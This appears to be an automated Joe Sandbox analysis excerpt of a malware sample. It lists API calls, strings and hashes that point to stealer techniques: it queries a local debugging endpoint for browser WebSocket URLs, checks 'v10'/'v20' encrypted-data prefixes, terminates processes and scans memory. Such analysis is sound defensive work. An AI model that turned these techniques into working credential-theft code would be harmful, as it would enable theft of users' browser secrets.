                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$Open$CloseHandle
                                                                                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                                                                                • API String ID: 3289985339-2144369209
                                                                                                • Opcode ID: f6ea82a8e87bece4c9da886c2de84f051623a7f4925580be6bfbf86350bd66ae
                                                                                                • Instruction ID: 62dbe43bf40bcea2ec6919899f10ce169cdfcd29f6908f6eb26e58a13f6c9638
                                                                                                • Opcode Fuzzy Hash: f6ea82a8e87bece4c9da886c2de84f051623a7f4925580be6bfbf86350bd66ae
                                                                                                • Instruction Fuzzy Hash: 27414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505B6191DBB8AEC0CF68
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID: @$access$cache
                                                                                                • API String ID: 1475443563-1361544076
                                                                                                • Opcode ID: 6a756704d9a5e632f7fc2e1c6f732c660ad2fd9c7916c21d548a59f960e475b6
                                                                                                • Instruction ID: bf7f6bc55254c54d21197c9aa673ce015ae0bdc4e4658c964804263f7089fac0
                                                                                                • Opcode Fuzzy Hash: 6a756704d9a5e632f7fc2e1c6f732c660ad2fd9c7916c21d548a59f960e475b6
                                                                                                • Instruction Fuzzy Hash: FDD16FB4A083558FEB11CFA4D48039EBBF1AF89318F28C45ED895AB341E339D841DB55
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: strcmp
                                                                                                • String ID: ya$ya$(blob)$NULL$Xya$bua$bua$program
                                                                                                • API String ID: 1004003707-2454903709
                                                                                                • Opcode ID: 159ce7650a377ea6ea6ab72cd320b4004e236130d8e3e4a11b54add8b656ccd7
                                                                                                • Instruction ID: 4befd86826370bfd8630e1afa8d422750160e2b9b2ea18a9ced5634f5bcee847
                                                                                                • Opcode Fuzzy Hash: 159ce7650a377ea6ea6ab72cd320b4004e236130d8e3e4a11b54add8b656ccd7
                                                                                                • Instruction Fuzzy Hash: 3B7115B49097469FC708CF58C191A59BBF0BF8A304F25C85EE8A89B751D335D882CF92
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitProcess$DefaultLangUser
                                                                                                • String ID: *
                                                                                                • API String ID: 1494266314-163128923
                                                                                                • Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                                                                                • Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
                                                                                                • Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                                                                                • Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52
                                                                                                APIs
                                                                                                • memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
                                                                                                • memset.MSVCRT ref: 0040A60B
                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 0040A664
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: memcmp$AllocLocallstrcpymemset
                                                                                                • String ID: @$v10$v20
                                                                                                • API String ID: 631489823-278772428
                                                                                                • Opcode ID: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                                                                                • Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
                                                                                                • Opcode Fuzzy Hash: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                                                                                • Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep_amsg_exit
                                                                                                • String ID:
                                                                                                • API String ID: 1015461914-0
                                                                                                • Opcode ID: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
                                                                                                • Instruction ID: a154691f748ef5392a7e4955094c5928503ae470ce452f5208c2c148eeae8840
                                                                                                • Opcode Fuzzy Hash: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
                                                                                                • Instruction Fuzzy Hash: 13414F71B146818FEB00AFE8C98470BB7F1EB85399F64C53DE4A48B344D775D9918B82
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
                                                                                                • Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
                                                                                                • Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00419A79
                                                                                                • CloseHandle.KERNEL32(0040A056), ref: 00419A88
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 2696918072-0
                                                                                                • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                                                                                • Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
                                                                                                • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                                                                                • Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51
                                                                                                APIs
                                                                                                • CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
                                                                                                • GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 004194B7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleSize
                                                                                                • String ID: >=A$>=A
                                                                                                • API String ID: 1378416451-3536956848
                                                                                                • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                                                                                • Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
                                                                                                • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                                                                                • Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 0041B69A
                                                                                                  • Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
                                                                                                  • Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
                                                                                                  • Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B2E6
                                                                                                • DecodePointer.KERNEL32(0042A258,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
                                                                                                • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B6E7
                                                                                                  • Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138
                                                                                                • DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B70D
                                                                                                • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B720
                                                                                                • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B72A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                • String ID:
                                                                                                • API String ID: 2005412495-0
                                                                                                • Opcode ID: d852e3d7d835d6e62f18a9395bea30f13d719b1b24e180a4b449e11ade6884fe
                                                                                                • Instruction ID: 83cc19c0f9a08cc6c8264b8aa057ea451e2e215f117fa7a6923d46f1cea91310
                                                                                                • Opcode Fuzzy Hash: d852e3d7d835d6e62f18a9395bea30f13d719b1b24e180a4b449e11ade6884fe
                                                                                                • Instruction Fuzzy Hash: D131F974900349DFDF11AFA9D9856DDBAF1FF88314F14402BE460A62A0DBB84985CF99
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 0041CD1A
                                                                                                  • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                                                                                  • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                                                                                • __amsg_exit.LIBCMT ref: 0041CD3A
                                                                                                • __lock.LIBCMT ref: 0041CD4A
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041CD67
                                                                                                • free.MSVCRT ref: 0041CD7A
                                                                                                • InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                                • String ID:
                                                                                                • API String ID: 634100517-0
                                                                                                • Opcode ID: 525e96ac9f68bb1e385b36e47090da98a0ef9a1698a14b7f5a5138d390f6750c
                                                                                                • Instruction ID: 9bccb4d37e88352bd342e74b92a79a764fb3ddc235490c160eda478cd1c3264c
                                                                                                • Opcode Fuzzy Hash: 525e96ac9f68bb1e385b36e47090da98a0ef9a1698a14b7f5a5138d390f6750c
                                                                                                • Instruction Fuzzy Hash: C8018835A816219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD
                                                                                                APIs
                                                                                                • strlen.MSVCRT ref: 0041719F
                                                                                                • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD
                                                                                                  • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
                                                                                                  • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85
                                                                                                • VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
                                                                                                • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333
                                                                                                  • Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                                • String ID: @
                                                                                                • API String ID: 2950663791-2766056989
                                                                                                • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                                                                                • Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
                                                                                                • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                                                                                • Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69
                                                                                                Strings
                                                                                                Memory Dump Source
